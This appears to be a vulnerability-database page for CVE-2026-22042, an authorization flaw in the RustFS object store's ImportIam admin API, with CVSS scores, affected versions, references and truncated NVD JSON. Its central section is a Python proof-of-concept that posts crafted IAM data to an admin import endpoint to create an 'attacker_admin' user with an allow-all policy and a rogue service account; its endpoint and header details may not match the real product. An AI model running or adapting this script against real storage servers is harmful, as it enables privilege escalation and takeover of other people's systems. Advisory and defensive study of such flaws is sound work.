CVE-2026-22042

Description

RustFS is a distributed object storage system built in Rust. Prior to version 1.0.0-alpha.79, he `ImportIam` admin API validates permissions using `ExportIAMAction` instead of `ImportIAMAction`, allowing a principal with export-only IAM permissions to perform import operations. Since importing IAM data performs privileged write actions (creating/updating users, groups, policies, and service accounts), this can lead to unauthorized IAM modification and privilege escalation. Version 1.0.0-alpha.79 fixes the issue.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha1:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha10:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha11:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha12:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:* - VULNERABLE

RustFS < 1.0.0-alpha.79

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-22042 RustFS ImportIam Permission Bypass PoC
Note: This is a proof-of-concept demonstrating the vulnerability.
Use only for authorized security testing.
"""

import requests
import json
import sys

def exploit_rustfs(target_url, access_key, secret_key):
    """
    Exploit the ImportIam permission bypass vulnerability
    """
    # Target endpoint
    endpoint = f"{target_url}/api/v1/admin/import-iam"
    
    # Malicious IAM data to import
    malicious_iam_data = {
        "users": [
            {
                "username": "attacker_admin",
                "password": "P@ssw0rd123!",
                "policy": "AdminPolicy",
                "groups": ["Administrators"]
            }
        ],
        "groups": [
            {
                "name": "Administrators",
                "members": ["attacker_admin"]
            }
        ],
        "policies": [
            {
                "name": "AdminPolicy",
                "document": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Effect": "Allow",
                            "Action": "*",
                            "Resource": "*"
                        }
                    ]
                }
            }
        ],
        "serviceAccounts": [
            {
                "name": "malicious_service",
                "accessKey": "AKIA_NEW_KEY",
                "secretKey": "secret_key_123456"
            }
        ]
    }
    
    headers = {
        "Content-Type": "application/json",
        "X-Access-Key": access_key,
        "X-Secret-Key": secret_key
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Endpoint: {endpoint}")
    print(f"[*] Sending malicious IAM data...")
    
    try:
        response = requests.post(endpoint, headers=headers, json=malicious_iam_data, timeout=30)
        
        if response.status_code == 200:
            print("[+] SUCCESS: IAM data imported successfully!")
            print("[+] Attacker now has admin access to RustFS")
            print(f"[*] Created user: attacker_admin with AdminPolicy")
            print(f"[*] Created service account: malicious_service")
            return True
        else:
            print(f"[-] FAILED: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python3 cve-2026-22042.py <target_url> <access_key> <secret_key>")
        print("Example: python3 cve-2026-22042.py https://rustfs.example.com admin_key secret_key")
        sys.exit(1)
    
    target = sys.argv[1]
    access_key = sys.argv[2]
    secret_key = sys.argv[3]
    
    exploit_rustfs(target, access_key, secret_key)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22042
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22042
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22042/
[4] VulDB https://vuldb.com/cve/CVE-2026-22042
[5] https://github.com/rustfs/rustfs/security/advisories/GHSA-vcwh-pff9-64cc
[6] https://github.com/rustfs/rustfs/security/advisories/GHSA-vcwh-pff9-64cc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22042", "sourceIdentifier": "[email protected]", "published": "2026-01-08T15:15:45.443", "lastModified": "2026-01-15T21:11:34.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustFS is a distributed object storage system built in Rust. Prior to version 1.0.0-alpha.79, he `ImportIam` admin API validates permissions using `ExportIAMAction` instead of `ImportIAMAction`, allowing a principal with export-only IAM permissions to perform import operations. Since importing IAM data performs privileged write actions (creating/updating users, groups, policies, and service accounts), this can lead to unauthorized IAM modification and privilege escalation. Version 1.0.0-alpha.79 fixes the issue."}, {"lang": "es", "value": "RustFS es un sistema de almacenamiento de objetos distribuido construido en Rust. Antes de la versión 1.0.0-alpha.79, la API de administración 'ImportIam' valida los permisos usando 'ExportIAMAction' en lugar de 'ImportIAMAction', permitiendo que una entidad con permisos IAM solo de exportación realice operaciones de importación. Dado que la importación de datos IAM realiza acciones de escritura privilegiadas (creación/actualización de usuarios, grupos, políticas y cuentas de servicio), esto puede llevar a una modificación no autorizada de IAM y escalada de privilegios. La versión 1.0.0-alpha.79 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-863"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha1:*:*:*:rust:*:*", "matchCriteriaId": "454A2F3A-76CF-4F2D-97FE-AEDEBE8FF1CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha10:*:*:*:rust:*:*", "matchCriteriaId": "32B2D146-7920-4C6D-B42F-1BDDF5193394"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha11:*:*:*:rust:*:*", "matchCriteriaId": "B25BC365-35BA-438A-B5B1-3FA696767821"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha12:*:*:*:rust:*:*", "matchCriteriaId": "B69213F1-7D94-4185-9309-FF3140733550"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*", "matchCriteriaId": "BD2476D6-257C-4A96-BED4-D8B002402242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*", "matchCriteriaId": "774EC64C-73ED-4D6B-893B-30A066DA934C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*", "matchCriteriaId": "4B567F4F-131F-4D4B-8C0C-9212F22F2BB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:*", "matchCriteriaId": "711F7641-A2B2-410B-B05D- ... (truncated)